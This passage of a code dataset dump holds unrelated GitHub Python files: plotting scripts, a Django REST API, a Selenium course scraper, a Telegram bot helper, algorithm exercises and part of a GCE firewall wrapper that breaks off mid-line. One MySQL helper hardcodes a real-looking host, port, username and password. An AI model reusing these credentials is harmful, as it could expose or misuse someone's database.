1]\n\nplt.figure()\nplt.scatter(actualGrowth['date'], actualGrowth[0], c = 'red')\nplt.scatter(actualGrowth['date'], actualGrowth[1], c = 'green')\nplt.show()\n# %%\ndates = {}\nfor c in classes:\n imNum = c.pcImg.split('_')[2]\n date = c.date\n if date not in dates.keys():\n dates[date] = []\n dates[date].append(imNum)\n\nnIms = []\nfor date in dates.keys():\n nIms.append(len(set(dates[date])))","repo_name":"TylerJost/cellMorph","sub_path":"notebooks/old/plotGrowth.py","file_name":"plotGrowth.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27636063171","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#zmiana wielkości okienka z wykresami\nfig = plt.figure(figsize=(7,5))\n\nnames = ['Avi', 'Jacob', 'Michelle', 'Brandon']\nscores = [88, 57, 23, 25]\nscores2 = [92, 68, 85, 74]\n\npositions = np.arange(len(scores))\n\n#trzeba ustawić taką samą szerokość słupów 1 i 2\nplt.bar(positions, scores, width = 0.3, color = \"orange\")\nplt.bar(positions + 0.3, scores2, width = 0.3 )\nplt.xlabel('Names')\nplt.ylabel('Scores')\nplt.title('Test scores')\n\n#zmiana nazwy pozycji z cyfry na imię\nplt.xticks(positions+0.15, names)\n#przy dodaniu drugiego słupka trzeba zmienić pozycje imion żeby lepiej wyglądało\n\n\nplt.show()","repo_name":"0xRobert1997/HelloWorld","sub_path":"PythonAvi/DataAnalysis/BarChart.py","file_name":"BarChart.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27610744825","text":"__author__ = 'dan'\n\nimport os\nimport shutil\n\ndef clean_dir(dir, target_list):\n for dirname, dirnames, filenames in os.walk(dir):\n print('searching dir ' + dirname)\n for subdirname in dirnames:\n fqdir = os.path.join(dirname, subdirname)\n if subdirname in target_list:\n print('deleting ' + fqdir)\n shutil.rmtree(fqdir)\n\n\ndef main(in_dir, targets):\n print('starting for dir=' + in_dir + ' targets=' + targets)\n target_list = targets.split('|')\n clean_dir(in_dir, target_list)\n print('finished')\n\n\nif __name__=='__main__':\n\n args = { 'in_dir': '/BOGUS',\n 'targets': 'target|.svn|.mortar-local'}\n model = main(**args)\n","repo_name":"ecodan/dpyutils","sub_path":"dir_cleaner.py","file_name":"dir_cleaner.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16690775971","text":"import logging\nimport os\nimport time\n\nfrom mars.scheduler.session import SessionManagerActor\n\nfrom ....config import options\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_MARS_IDLE_TIMEOUT = 3 * 3600\nCUPID_LAST_IDLE_TIME_KEY = \"MarsServiceLastIdleTime\"\n\n\nclass CupidSessionManagerActor(SessionManagerActor):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if \"MARS_INSTANCE_IDLE_TIMEOUT\" in os.environ:\n self._idle_timeout = int(os.environ[\"MARS_INSTANCE_IDLE_TIMEOUT\"])\n else:\n self._idle_timeout = DEFAULT_MARS_IDLE_TIMEOUT\n\n self._last_active_time = time.time()\n self._last_active_time_from_service = None\n self._check_started = False\n\n def create_session(self, *args, **kwargs):\n session_ref = super().create_session(*args, **kwargs)\n self._last_activity_time = time.time()\n if not self._check_started and self._idle_timeout is not None:\n from cupid.runtime import context\n\n self._check_started = True\n kv_store = context().kv_store()\n last_idle_time_str = kv_store.get(CUPID_LAST_IDLE_TIME_KEY) or 0\n _, self._last_active_time_from_service = self._get_service_activity_info()\n if not last_idle_time_str:\n self._last_active_time = self._last_active_time_from_service\n else:\n self._last_active_time = float(last_idle_time_str)\n\n self.ref().check_instance_idle(_delay=10, _tell=True, _wait=False)\n logger.info(\n \"Instance will go timeout in %s seconds when no active sessions.\",\n self._idle_timeout,\n )\n return session_ref\n\n def _get_service_activity_info(self):\n last_active_time = self._last_active_time\n has_running = False\n for ref in self._session_refs.values():\n for info in ref.get_graph_infos().values():\n if info.get(\"end_time\") is None:\n has_running = True\n break\n else:\n last_active_time = max(info[\"end_time\"], last_active_time)\n if has_running:\n break\n return has_running, last_active_time\n\n def check_instance_idle(self):\n from cupid.runtime import context\n\n has_running, active_time_from_service = self._get_service_activity_info()\n if active_time_from_service != self._last_active_time_from_service:\n self._last_active_time = active_time_from_service\n self._last_active_time_from_service = active_time_from_service\n elif has_running:\n self._last_active_time = time.time()\n\n if self._last_active_time < time.time() - self._idle_timeout:\n # timeout: we need to kill the instance\n logger.warning(\"Timeout met, killing the instance now.\")\n self._stop_instance()\n else:\n kv_store = context().kv_store()\n kv_store[CUPID_LAST_IDLE_TIME_KEY] = str(self._last_active_time)\n self.ref().check_instance_idle(_delay=10, _tell=True, _wait=False)\n\n @staticmethod\n def _stop_instance():\n from cupid import context, ContainerStatus, WorkItemProgress\n from odps import ODPS\n from odps.accounts import BearerTokenAccount\n\n cupid_context = context()\n cupid_context.report_container_status(\n ContainerStatus.TERMINATED,\n \"Instance idle timed out, stopping\",\n WorkItemProgress.WIP_TERMINATING,\n )\n time.sleep(options.mars.container_status_timeout)\n\n # when instance is still not stopped, we kill forcifully\n bearer_token = cupid_context.get_bearer_token()\n account = BearerTokenAccount(bearer_token)\n project = os.environ[\"ODPS_PROJECT_NAME\"]\n endpoint = os.environ[\"ODPS_RUNTIME_ENDPOINT\"]\n o = ODPS(None, None, account=account, project=project, endpoint=endpoint)\n\n o.stop_instance(os.environ[\"MARS_K8S_POD_NAMESPACE\"])\n\n\ntry:\n from ...internal.core import DEFAULT_MARS_IDLE_TIMEOUT\nexcept ImportError:\n pass\n","repo_name":"aliyun/aliyun-odps-python-sdk","sub_path":"odps/mars_extension/legacy/actors/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":399,"dataset":"github-code","pt":"48"} +{"seq_id":"1108490986","text":"import copy\nfrom itertools import groupby\nfrom datetime import datetime\nfrom django.db.models import Q\nfrom django.contrib.auth.models import AnonymousUser\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import APIException\n\nfrom back_end.bilibili import get_anime_detail, search\n\nfrom models import Anime, Subscription, User, Season, Track\nfrom permission import ReadOnly, IsOwner, IsAuthenticated, IsSelf, AllowAny\nfrom serializers import AnimeSerializer, SubscriptionSerializer, UserSerializer, \\\n UserCreateSerializer, SubscriptionUpdateSerializer, SearchSerializer, \\\n SeasonSerializer, SubscriptionCreateSerializer, UserUpdateSerializer, \\\n TrackSerializer, UserProfileSerializer\nfrom constants import SUBSCRIPTION_FORGONE, SUBSCRIPTION_WATCHED, \\\n SUBSCRIPTION_UNWATCHED, SUBSCRIPTION_WATCHING\n\n\nclass AnimeViewSet(viewsets.ModelViewSet):\n queryset = Anime.objects.all()\n serializer_class = AnimeSerializer\n permission_classes = (ReadOnly,)\n\n\nclass SubscriptionViewSet(viewsets.ModelViewSet):\n permission_classes = (IsOwner, IsAuthenticated,)\n\n def get_serializer_class(self):\n if self.request.method in ('PUT', 'PATCH', ):\n return SubscriptionUpdateSerializer\n elif self.request.method in ('GET', ):\n return SubscriptionSerializer\n return SubscriptionCreateSerializer\n\n def get_queryset(self):\n return Subscription.objects.filter(~Q(status=SUBSCRIPTION_FORGONE) &\n Q(user=self.request.user))\n\n def pre_save(self, obj):\n obj.user = self.request.user\n\n # override `create` method\n def create(self, request, *args, **kwargs):\n aid = request.DATA.get('id')\n anime = Anime.objects.filter(aid=aid)\n if not anime:\n # Get the anime data from back_end\n anime_data = get_anime_detail(aid=aid)\n if not anime_data:\n raise APIException(detail='Anime not found')\n\n # convert the timestamp to `datetime` object, then save the object\n anime_data['updated_time'] = datetime.fromtimestamp(anime_data['updated_time'])\n _anime = AnimeSerializer(data=anime_data)\n if _anime.is_valid():\n anime = _anime.save()\n else:\n return Response(data={'error': _anime._errors}, status=status.HTTP_400_BAD_REQUEST)\n\n seasons = anime_data['season'] if anime_data else anime\n # Save the `season`\n for season in seasons:\n if not Season.objects.filter(season_id=season['season_id']):\n season['anime'] = anime.id\n _season = SeasonSerializer(data=season)\n if _season.is_valid():\n _season.save()\n else:\n anime = anime[0]\n\n instance = Subscription.objects.filter(Q(user=self.request.user) & Q(anime_id=anime.id))\n\n if not instance:\n Subscription.objects.create(anime=anime, user=self.request.user)\n else:\n instance = instance.first()\n if not instance.status == SUBSCRIPTION_FORGONE:\n raise APIException(detail='You had already add the anime to your subscriptions.')\n instance.status = SUBSCRIPTION_WATCHING\n instance.currently_watched = 0\n instance.save()\n\n return Response(data={'anime': anime.id}, status=status.HTTP_201_CREATED)\n\n # override `update` method\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n\n if instance.status == SUBSCRIPTION_FORGONE:\n raise APIException(detail='Detail not found')\n # `SUBSCRIPTION_FORGONE` status only can be marked when\n # the `DELETE` method been used\n request_data = dict(copy.deepcopy(request.data))\n if not status in (SUBSCRIPTION_WATCHED, SUBSCRIPTION_WATCHING):\n request_data['status'] = SUBSCRIPTION_WATCHING\n\n serializer = self.get_serializer(instance, data=request_data, partial=partial)\n serializer.is_valid(raise_exception=True)\n\n # TODO: if the anime don't have any season, then?\n # check the submitted `count` is valid or not\n currently_watched = int(request.data['currently_watched'])\n if instance.season:\n if (instance.season.count < currently_watched or currently_watched < 0):\n raise APIException(detail='The episode count is not valid')\n else:\n if instance.anime.episode < currently_watched:\n raise APIException(detail='The episode count is not valid')\n\n self.perform_update(serializer)\n return Response(serializer.data)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.status = SUBSCRIPTION_FORGONE\n instance.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass SearchViewSet(viewsets.ReadOnlyModelViewSet):\n serializer_class = SearchSerializer\n\n def get_queryset(self):\n keyword = self.request.GET.get('keyword', None)\n if not keyword:\n return []\n\n data = Anime.objects.filter(Q(name__contains=keyword) | Q(description__contains=keyword))\n return data if data else search(keyword)\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n permission_classes = (IsSelf,)\n queryset = User.objects.all()\n\n def get_serializer_class(self):\n if self.request.method in ('POST', ):\n return UserCreateSerializer\n elif self.request.method in ('PUT', 'PATCH'):\n return UserUpdateSerializer\n else:\n return UserProfileSerializer\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer_class = UserSerializer if instance == request.user \\\n else UserProfileSerializer\n serializer = serializer_class(instance)\n return Response(serializer.data)\n\n def create(self, request, *args, **kwargs):\n user = UserCreateSerializer(data=request.DATA)\n if user.is_valid():\n if User.objects.filter(email__iexact=user.data['email']):\n raise APIException(detail='The email had been used.')\n User.objects.create_user(**user.data)\n return Response(user.data, status=status.HTTP_201_CREATED)\n else:\n return Response(user.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"RicterZ/AnimeReminder","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"74044534545","text":"# Given a string, find the first repeated character in it.\n# We need to find the character that occurs more than once and whose index of\n# second occurrence is smallest.\n\n#sample test case\n#Input - geeksforgeeks\n#Output - 'e'\n#Input - gekmke\n#Output - 'k' -- because index of the point where element is repeated is less\n\n#one pointer in the beginning, one at the end,but the end pointer should not move\n#if the element at the beginning is not repeating, one way is to make a hash table,\n# and check for the values\n\n\ndef find_repeating(string):\n alpha_set = set()\n for each in string:\n if each in alpha_set:\n return each\n else:\n alpha_set.add(each)\n return -1\n\nstring = 'mjabkkmj'\nprint(find_repeating(string))\n","repo_name":"Harshit-Raj-2000/Algorithms-and-Data-Structures","sub_path":"coding interview practice/strings/first repeating character.py","file_name":"first repeating character.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4576968994","text":"#!/usr/bin/env python3\n\n# Get a dictionary of the courses that meet the\n# American History and Institutions GE requirement at UCSB\n# from this page:\n# https://my.sa.ucsb.edu/catalog/Current/UndergraduateEducation/AHICourseList.aspx\n\nimport json\nimport datetime\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nimport pprint\nfrom copy import deepcopy\nfrom time import sleep\n\nahi_url=\"https://my.sa.ucsb.edu/catalog/Current/UndergraduateEducation/AHICourseList.aspx\"\n\ndef p_to_tuple(p_element):\n '''\n turn a p element into a tuple (course_num,title) for a given GE\n\n given the selenium object that represents one p element\n from the target web page, return a dictionary of the form,\n for example: {\"ANTH 131\":\"North American Indians\"}\n\n The p element has this format:\n\n

\n ANTH 131 - North American Indians \n \n

\n '''\n\n # Course Number, e.g. ANTH 131, is the text of the p element,\n # stripped of white space\n p_text = p_element.text.strip()\n course_num = p_text.split(\"-\",1)[0].strip()\n \n # course_title, e.g. \"North American Indians\"\n # is the text of the child i element\n\n child_i_element = p_element.find_elements_by_xpath(\"i\")\n course_title = child_i_element[0].text.strip()\n\n return (course_num,course_title)\n \n\n\nif __name__==\"__main__\":\n \n # Bring up the firefox driver (this line would be different for Chrome)\n # See README.md of this repo for instructions on downloading that\n \n # driver = webdriver.Firefox()\n driver = webdriver.Chrome()\n\n driver.get(ahi_url)\n expected_title = \"UC Santa Barbara General Catalog - American History and Institutions Course List\"\n stripped_title=driver.title.strip()\n if expected_title == stripped_title:\n print(\"found \",expected_title)\n else:\n print(\"I was expecting title:\",expected_title)\n print(\"But what I got instead was: \",stripped_title)\n\n # Look for div with id=content\n # Under that we want div with class contentpadding\n # Under that we want ALL of the p elements\n\n list_of_p_elements = driver.find_elements_by_xpath(\"//div[@id='content']/div[@class='contentpadding']/p\")\n\n # dictionary <- list of tuples <- map <- (list of elem mapped to tuples)\n \n AHI_dict = dict(list(map(p_to_tuple,list_of_p_elements)))\n\n pprint.pprint(AHI_dict)\n driver.close()\n","repo_name":"ucsb-cs8/selenium-scrape-ucsb-courses","sub_path":"AHI/getAHI.py","file_name":"getAHI.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4896368830","text":"import asyncio\n\nfrom Music.MusicUtilities.database.queue import is_active_chat\nfrom Music.MusicUtilities.tgcallsrun.music import smexy\nfrom Music.config import AUTO_LEAVE, LOG_GROUP_ID\n\n\nasync def auto_leave():\n if AUTO_LEAVE == str(True):\n while not await asyncio.sleep(AUTO_LEAVE):\n async for i in smexy.iter_dialogs():\n chat_type = i.chat.type\n if chat_type in [\n \"supergroup\",\n \"group\",\n ]:\n chat_id = i.chat.id\n if (\n chat_id != LOG_GROUP_ID\n and chat_id != -1001627221128\n and chat_id != -1001665437027\n and chat_id != -1001202786293\n ):\n if not await is_active_chat(chat_id):\n try:\n await smexy.leave_chat(\n chat_id\n )\n except:\n continue\n\n\nasyncio.create_task(auto_leave())\n","repo_name":"Halawa-Ex/ex-music","sub_path":"Music/helpers/userbotleave.py","file_name":"userbotleave.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10715955101","text":"\r\nmarks=[] #creating list marks\r\nm=\"start\"\r\ni=0\r\nwhile m!=\"s\":\r\n i+=1\r\n print(\"enter marks of student\",i)\r\n a=int(input())\r\n marks.append(a)\r\n m=input(\"press any other key to continue entering marks of students or 's' to stop: \") #inputing marks of students into marks until m=”s”\r\nprint(marks) #print marks\r\na=max(marks) # calculating maximum marks\r\nprint(\"highest marks scored\", a) #displaying maximum marks\r\ne=marks.count(a) #calculating number of students with maximum marks\r\nprint(\"number of students scoring highest marks\",e) #displaying number of students with maximum marks\r\nmarks1=[] #creating a list marks1\r\nmarks1=marks1+marks \r\nfor i in marks1:\r\n if i==a:\r\n marks1.remove(i) #removing maximum marks in marks1\r\nprint(\"second highest marks scored:\", max(marks1)) #finding 2nd highest marks scored in marks\r\nprint(marks)\r\nc=int(input(\"enter fail marks:\")) #receiving fail marks\r\ni=0\r\nn=len(marks)#finding length of marks\r\nwhile i int:\n jthSmallest = len(nums) - k\n\n return self.quickSelect(nums, 0, len(nums) - 1, jthSmallest)\n\n def quickSelect(self, nums: List[int], start: int, end: int, jthSmallest: int) -> int:\n\n pivot = self.partition(nums, start, end)\n\n if (pivot == jthSmallest):\n return nums[pivot]\n elif (jthSmallest < pivot):\n return self.quickSelect(nums, start, pivot - 1, jthSmallest)\n else:\n return self.quickSelect(nums, pivot + 1, end, jthSmallest)\n\n def partition(self, nums: List[int], start: int, end: int) -> int:\n randomIndex = randint(start, end)\n\n self.swap(nums, randomIndex, start)\n\n pivot = nums[start]\n\n smaller = start\n\n for bigger in range(start + 1, end + 1):\n if nums[bigger] < pivot:\n smaller += 1\n self.swap(nums, smaller, bigger)\n\n self.swap(nums, start, smaller)\n\n return smaller\n\n def swap(self, nums: List[int], i: int, j: int) -> None:\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n\n\nprint(Solution().findKthLargest([4, 1, 2, 11], 2))\n","repo_name":"sammndhr/algorithms","sub_path":"interview_kickstart/01_sorting_algorithms/class_discussed_problems/python/0215_kth_largest_element_in_an_array.py","file_name":"0215_kth_largest_element_in_an_array.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15636591876","text":"#!usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport pymysql\n\nclass use_mysql():\n\n def __init__(self,hostname=\"183.131.6.183\",portno=4987,username=\"test_ggcj\",\n pwd=\"test_ggcj_2013\",db=\"ggcj_gift_statistics\"):\n\n self.conn = pymysql.connect(host=hostname,port=portno,user=username,passwd=pwd)\n self.cur = self.conn.cursor()\n self.cur.execute(\"USE \"+db)\n\n # print (\"数据库连接异常,请检查\")\n\n # print (cur.fetchone()[0])\n\n\n def select_sql(self,sql=\"SELECT amount FROM t_all_new_statistics order by amount DESC \"):\n\n allrang_list = []\n\n count = self.cur.execute(sql)\n for line in self.cur.fetchall():\n allrang_list.append(line[0])\n\n # print (\"数据库查询失败\")\n # print (count)\\\n allrang_list = self.cur.fetchall()\n for each in allrang_list:\n print (each)\n # return allrang_list\n\n def close_sql(self):\n self.conn.close()\n\n\nif __name__ == \"__main__\":\n test_mysql = use_mysql()\n test_mysql.select_sql()\n","repo_name":"songjianmin/ggcj","sub_path":"huodong/huodong_mysql.py","file_name":"huodong_mysql.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12226166835","text":"import aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\nfrom postgresql import Database\nimport time\nimport json\nfrom urllib.parse import urlparse\nfrom fake_useragent import UserAgent\n\n\n\ndb = Database()\nasync def main():\n start_time = time.time()\n with open('../urls.txt', 'r') as urls:\n tasks = []\n for url in urls:\n tasks.append(asyncio.create_task(get_website_code(url.strip())))\n\n pages = await asyncio.gather(*tasks)\n start_time_2 = time.time()\n time_for_db = 0\n for page in pages:\n if page[0]:\n data = get_data(page[0], page[1])\n start_time_3 = time.time()\n db.add_data(data, page[1])\n time_for_db += time.time()-start_time_3\n\n print(f\"Время затраченное на запросы к дб: {time_for_db}\")\n print(f\"Время затраченное на синхронную часть: {time.time() - start_time_2}\")\n\n\n finish_time = time.time() - start_time\n print(f'time for script ---- {finish_time}s')\n\n\nlist_urls = []\nasync def get_website_code(url):\n domain = '.'.join(urlparse(url.strip()).netloc.split('.')[:-1])\n while list_urls.count(domain) > 5:\n await asyncio.sleep(1)\n\n list_urls.append(domain)\n page = None\n try:\n async with aiohttp.ClientSession() as session:\n headers = {\n 'User-Agent': UserAgent().chrome\n }\n response = await session.post(url, headers=headers)\n\n list_urls.remove(domain)\n if response.status in [301, 302, 403, 404, 500, 504]:\n print(f'-----------------------{response.status}----------------------- {url}')\n else:\n page = await response.text()\n except UnicodeDecodeError:\n print(f\"------ {url} -------- Can't decode page\")\n except Exception as ex:\n print(f'------ {url} --------\\n{ex}')\n finally:\n return [page, url]\n\ndef get_data(page, url):\n soup = BeautifulSoup(page, 'html.parser')\n print(page)\n\n title = soup.find('title')\n if title:\n title = title.text.strip()\n\n meta_discription = soup.find('meta', {'name': 'description'})\n if meta_discription:\n meta_discription = meta_discription.get('content')\n\n headers = {}\n for index, header in enumerate(['h1', 'h2', 'h3', 'h4', 'h5', 'h6']):\n headers[header] = [h1.text.strip() for h1 in soup.find_all(header)]\n\n schema_markup = [i.text.strip('\\n') for i in soup.find_all('script', {'type': 'application/ld+json'})]\n\n with open('../selectors.json', 'r') as file:\n selectors = json.load(file)\n elements = {}\n type_key = 'for_all'\n if url in selectors:\n type_key = url\n\n try:\n for key, value in selectors[type_key].items():\n if isinstance(value, list):\n elements[key] = soup.select(f'{value[0]}')[0].get(f'{value[1]}')\n else:\n elements[key] = soup.select(f'{value}')[0].text.strip()\n except IndexError:\n elements[key] = None\n\n\n data = {\n 'title': title,\n 'meta_description': meta_discription,\n 'headers': json.dumps(headers),\n 'schema_markup': json.dumps(schema_markup),\n 'text': soup.text.replace('\\n', ''),\n 'selectors': json.dumps(elements)\n }\n return data\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"Freelance111/parser","sub_path":"for_the_same_domains/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16717692111","text":"import hashlib\nimport httplib\nimport json\nimport operator\nimport socket\nimport ssl\nimport time\n\nfrom googleapiclient import errors\nimport httplib2\nfrom retrying import retry\nfrom google.apputils import datelib\nfrom google.cloud.security.common.util import log_util\n\n# TODO: The next editor must remove this disable and correct issues.\n# pylint: disable=missing-type-doc,missing-return-type-doc,missing-return-doc\n# pylint: disable=missing-param-doc,missing-raises-doc\n\n# The name of the GCE API.\nAPI_NAME = 'compute'\n\n# The root of the GCE API.\nAPI_ROOT = 'https://www.googleapis.com/'\n\n# The version of the GCE API to use.\nAPI_VERSION = 'v1'\n\n# The compute engine scope.\nSCOPE = 'https://www.googleapis.com/auth/compute'\n\nLOGGER = log_util.get_logger(__name__)\n\n# What transient exceptions should be retried.\nRETRY_EXCEPTIONS = (httplib.ResponseNotReady, httplib.IncompleteRead,\n httplib2.ServerNotFoundError, socket.error, ssl.SSLError,)\n\n# Allowed items in a firewall rule.\nALLOWED_RULE_ITEMS = set(('allowed', 'description', 'name', 'network',\n 'sourceRanges', 'sourceTags', 'targetTags'))\n\n# Maximum time to allow an active API operation to wait for status=Done\nOPERATION_TIMEOUT = 300.0\n\n\nclass Error(Exception):\n \"\"\"Base error class for the module.\"\"\"\n\n\nclass FirewallEnforcementFailedError(Error):\n \"\"\"Updating firewall for project failed.\"\"\"\n\n\nclass InvalidFirewallRuleError(Error):\n \"\"\"Raised if a firewall rule doesn't look like a firewall rule should.\"\"\"\n\n\nclass DuplicateFirewallRuleNameError(Error):\n \"\"\"Raised if a rule name is reused in a policy, names must be unique.\"\"\"\n\n\ndef http_retry(e):\n \"\"\"retry_on_exception for retry. Returns True for exceptions to retry.\"\"\"\n if isinstance(e, errors.HttpError):\n return e.resp.status in (429, 500, 502, 503)\n if isinstance(e, RETRY_EXCEPTIONS):\n return True\n return False\n\n\ndef get_network_name_from_url(network_url):\n \"\"\"Given a network URL, return the name of the network.\n\n Args:\n network_url: str - the fully qualified network url, such as\n (https://www.googleapis.com/compute/v1/projects/'\n 'my-proj/global/networks/my-network')\n\n Returns:\n str - the network name, my-network in the previous example\n \"\"\"\n return network_url.split('/')[-1]\n\n\ndef build_network_url(project, network):\n \"\"\"Render the network url from project and network names.\n\n Args:\n project: A str- The name of the GCE project to operate upon.\n network: A str- The name of the network to operate upon.\n\n Returns:\n The fully qualified network url for the given project/network.\n \"\"\"\n return (u'%(root)s%(api_name)s/%(version)s/projects/%(project)s/global/'\n 'networks/%(network)s') % {\n 'api_name': API_NAME,\n 'network': network,\n 'project': project,\n 'root': API_ROOT,\n 'version': API_VERSION\n }\n\n\nclass ComputeFirewallAPI(object):\n \"\"\"Wrap calls to the Google Compute Engine API.\n\n API calls are decorated with retry to ensure temporary network errors do not\n cause failures.\n\n If initialized in dry run mode, calls which could modify the compute project\n are no-ops and always return a successful result.\n \"\"\"\n\n def __init__(self, gce_service, dry_run=False):\n \"\"\"Constructor.\n\n Args:\n gce_service: A GCE service object built using the discovery API.\n dry_run: Bool - True to perform a dry run for reporting firewall\n changes.\n \"\"\"\n self.gce_service = gce_service\n self._dry_run = dry_run\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def list_networks(self, project, fields=None):\n \"\"\"List the networks associated with a GCE project.\n\n Args:\n project: The id of the project to query.\n fields: If defined, limits the response to a subset of all fields.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.debug('Listing networks...')\n return self.gce_service.networks().list(\n project=project, fields=fields).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def list_firewalls(self, project, page_token=None):\n \"\"\"List the firewalls of a given project.\n\n Args:\n project: The id of the project to query.\n page_token: A str or None- if set, then a pageToken\n to pass to the GCE api call.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.debug('Listing firewalls...')\n return self.gce_service.firewalls().list(\n project=project, pageToken=page_token).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def delete_firewall_rule(self, project, rule):\n \"\"\"Delete firewall rules.\n\n Args:\n project: The id of the project to modify.\n rule: The firewall rule dict to delete.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.info('Deleting firewall rule %s on project %s. Deleted rule: %s',\n rule['name'], project, json.dumps(rule))\n if self._dry_run:\n return self._create_dry_run_response(rule['name'])\n return self.gce_service.firewalls().delete(\n firewall=rule['name'], project=project).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def insert_firewall_rule(self, project, rule):\n \"\"\"Insert a firewall rule.\n\n Args:\n project: The id of the project to modify.\n rule: The firewall rule dict to add.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.info(\n 'Inserting firewall rule %s on project %s. Inserted rule: %s',\n rule['name'], project, json.dumps(rule))\n if self._dry_run:\n return self._create_dry_run_response(rule['name'])\n return self.gce_service.firewalls().insert(\n body=rule, project=project).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def update_firewall_rule(self, project, rule):\n \"\"\"Update a firewall rule.\n\n Args:\n project: The id of the project to modify.\n rule: The firewall rule dict to update.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.info('Updating firewall rule %s on project %s. Updated rule: %s',\n rule['name'], project, json.dumps(rule))\n if self._dry_run:\n return self._create_dry_run_response(rule['name'])\n return self.gce_service.firewalls().update(\n body=rule, firewall=rule['name'], project=project).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n # TODO: Investigate improving so we can avoid the pylint disable.\n # pylint: disable=too-many-locals\n def wait_for_any_to_complete(self, project, responses, timeout=0):\n \"\"\"Wait for one or more requests to complete.\n\n Args:\n project: The id of the project to query.\n responses: A list of Response objects from GCE for the operation.\n timeout: An optional maximum time in seconds to wait for an operation\n to complete. Operations that exceed the timeout are marked as\n Failed.\n\n Returns:\n A tuple of (completed, still_running) requests.\n \"\"\"\n started_timestamp = time.time()\n\n while True:\n completed_operations = []\n running_operations = []\n for response in responses:\n status = response['status']\n if status == 'DONE':\n completed_operations.append(response)\n continue\n\n operation_name = response['name']\n LOGGER.debug('Checking on operation %s', operation_name)\n request = self.gce_service.globalOperations().get(\n project=project, operation=operation_name)\n response = request.execute()\n status = response['status']\n LOGGER.info('status of %s is %s', operation_name, status)\n if response['status'] == 'DONE':\n completed_operations.append(response)\n continue\n\n if timeout and time.time() - started_timestamp > timeout:\n # Add a timeout error to the response\n LOGGER.error(\n 'Operation %s did not complete before timeout of %f, '\n 'marking operation as failed.', operation_name, timeout)\n response.setdefault('error', {}).setdefault(\n 'errors', []).append({\n 'code':\n 'OPERATION_TIMEOUT',\n 'message': (\n 'Operation exceeded timeout for completion '\n 'of %0.2f seconds' % timeout)\n })\n completed_operations.append(response)\n else:\n # Operation still running\n running_operations.append(response)\n\n if completed_operations or not responses:\n break\n else:\n time.sleep(2)\n\n for response in completed_operations:\n try:\n op_insert_timestamp = datelib.Timestamp.FromString(\n response.get('insertTime', '')).AsSecondsSinceEpoch()\n op_start_timestamp = datelib.Timestamp.FromString(\n response.get('startTime', '')).AsSecondsSinceEpoch()\n op_end_timestamp = datelib.Timestamp.FromString(\n response.get('endTime', '')).AsSecondsSinceEpoch()\n except ValueError:\n op_insert_timestamp = op_start_timestamp = op_end_timestamp = 0\n\n op_wait_time = op_end_timestamp - op_insert_timestamp\n op_exec_time = op_end_timestamp - op_start_timestamp\n LOGGER.info('Operation %s completed. Operation type: %s, '\n 'request time: %s, start time: %s, finished time: %s, '\n 'req->end seconds: %i, start->end seconds: %i.',\n response.get('name', ''),\n response.get('operationType', ''),\n response.get('insertTime', ''),\n response.get('startTime', ''),\n response.get('endTime', ''), op_wait_time, op_exec_time)\n LOGGER.debug('Operation response object: 